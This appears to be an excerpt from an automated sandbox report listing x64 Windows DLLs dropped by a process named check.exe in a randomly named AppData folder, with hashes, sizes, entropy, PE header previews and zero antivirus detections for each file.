                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3385328
                                                                                                                                                                                                            Entropy (8bit):6.382356347494905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                            MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                            SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                            SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                            SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20923392
                                                                                                                                                                                                            Entropy (8bit):6.255903817217008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                            MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                            SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                            SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                            SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68080
                                                                                                                                                                                                            Entropy (8bit):6.207162014262433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                            MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                            SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                            SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                            SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41968
                                                                                                                                                                                                            Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                            MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                            SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                            SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                            SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39408
                                                                                                                                                                                                            Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                            MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                            SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                            SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                            SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45040
                                                                                                                                                                                                            Entropy (8bit):6.016125225197622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                            MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                            SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                            SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                            SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38384
                                                                                                                                                                                                            Entropy (8bit):5.957072398645384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                            MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                            SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                            SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                            SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):421360
                                                                                                                                                                                                            Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                            MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                            SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                            SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                            SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32240
                                                                                                                                                                                                            Entropy (8bit):5.978149408776758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                            MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                            SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                            SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                            SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):5.865766652452823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                            MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                            SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                            SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                            SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):390128
                                                                                                                                                                                                            Entropy (8bit):5.724665470266677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                            MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                            SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                            SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                            SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30192
                                                                                                                                                                                                            Entropy (8bit):5.938644231596902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                            MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                            SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                            SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                            SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):510448
                                                                                                                                                                                                            Entropy (8bit):6.605517748735854
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                            MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                            SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                            SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                            SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):844784
                                                                                                                                                                                                            Entropy (8bit):6.625808732261156
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                            MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                            SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                            SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                            SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):754672
                                                                                                                                                                                                            Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                            MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                            SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                            SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                            SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):482288
                                                                                                                                                                                                            Entropy (8bit):6.152380961313931
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                            MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                            SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                            SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                            SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
